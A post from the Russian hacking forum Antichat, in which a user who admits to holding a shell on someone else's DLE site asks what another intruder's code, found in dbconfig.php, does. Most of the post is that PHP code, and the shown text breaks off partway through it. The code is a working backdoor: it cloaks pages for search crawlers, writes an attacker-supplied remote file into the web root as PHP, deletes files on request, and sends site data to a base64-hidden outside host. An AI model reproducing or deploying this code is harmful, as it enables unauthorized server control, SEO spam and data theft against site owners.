Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Что делает сосед по шеллу? (https://forum.antichat.xyz/showthread.php?t=351005)

spiderbuber 13.09.2012 09:37
Сегодня на одном брошенном шелле заметил соседа.

Движок ДЛЕ, код был в dbconfig.php

Интересует, что делает его код?

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_content_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]){

 if([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"];

 }

 else{

[/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

if( @[/COLOR][COLOR="#0000BB"]function_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'curl_init'[/COLOR][COLOR="#007700"]) ){

 if([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]() ){

if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_URL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

 if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

 if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_CONNECTTIMEOUT[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

 if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

 if( !@[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_ENCODING[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"gzip,deflate"[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]);

 @[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]);

 }

 }

 else{

[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_url[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$frt[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]],!empty([/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'port'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'port'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"]) ){

[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'GET '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' HTTP/1.0'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'Host: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$u[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'Connection: Close'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n\r\n"[/COLOR][COLOR="#007700"];

@[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

while( ![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]) ){

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"].= @[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\r\n\r\n"[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);

@[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]);

 }

 }

return[/COLOR][COLOR="#0000BB"]$ret[/COLOR][COLOR="#007700"];

}

function[/COLOR][COLOR="#0000BB"]filtr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]){

 return[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripcslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"']*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]))));

}

function[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"::::"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#0000BB"]filtr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$test[/COLOR][COLOR="#007700"]);

}

function[/COLOR][COLOR="#0000BB"]get_n_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]preg_match_all[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"']*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$all[/COLOR][COLOR="#007700"]);

 foreach([/COLOR][COLOR="#0000BB"]$all[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^www\./'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_HOST"[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^www\./'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

if([/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$h_link[/COLOR][COLOR="#007700"];

 }

 }

 return[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]);

}

function[/COLOR][COLOR="#0000BB"]title_desc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]){

 global[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"];

 if([/COLOR][COLOR="#0000BB"]preg_match_all[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'\]*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$math[/COLOR][COLOR="#007700"])){

 foreach([/COLOR][COLOR="#0000BB"]$math[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]){

 if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"description"[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'content=[\"\'](.*?)[\"\']'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

 }

 if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"keywords"[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'content=[\"\'](.*?)[\"\']'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);

 }

 if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Content-Type"[/COLOR][COLOR="#007700"]) or[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"content-type"[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'charset=(.*?)[\"\']'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]);

 }

}

 }

 if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"']*>(.*?)]*>'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"])){

 if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'»'[/COLOR][COLOR="#007700"]))

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"'(.*?)»'si"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);

 else[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$pre_title[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

 }

}

function[/COLOR][COLOR="#0000BB"]get_asp[/COLOR][COLOR="#007700"](){

 global[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$URI[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"REQUEST_URI"[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$HOST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_HOST"[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Yandex'[/COLOR][COLOR="#007700"]) or[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Google'[/COLOR][COLOR="#007700"])){

 print[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];

if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_onload'[/COLOR][COLOR="#007700"]]){

 if(@[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_onload'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'in'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) {

 @[/COLOR][COLOR="#0000BB"]chmod[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_onload'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'in'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0666[/COLOR][COLOR="#007700"]);

 print[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 }

 }

 if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_unload'[/COLOR][COLOR="#007700"]]){

 if(@[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'get_unload'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"])) print[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_content_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'aHR0cDovLw=='[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$HOST[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$URI[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]title_desc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$s_temp[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/main.tpl'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$vs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_n_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$temp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_n_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s_temp[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'n'[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Yandex'[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'y'[/COLOR][COLOR="#007700"];

 }

 elseif([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'Google'[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'g'[/COLOR][COLOR="#007700"];

 }

if([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'utf-8'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_content_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'aHR0cDovL3BvZHN0YXZhLndzL2NvbmVjdC5waHA/dXJsPQ=='[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$URI[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&host='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HOST[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&t='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'&k='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'&d='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]srt_rep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'&vs='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$vs[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&temp='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$temp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&hu='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&ip='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLO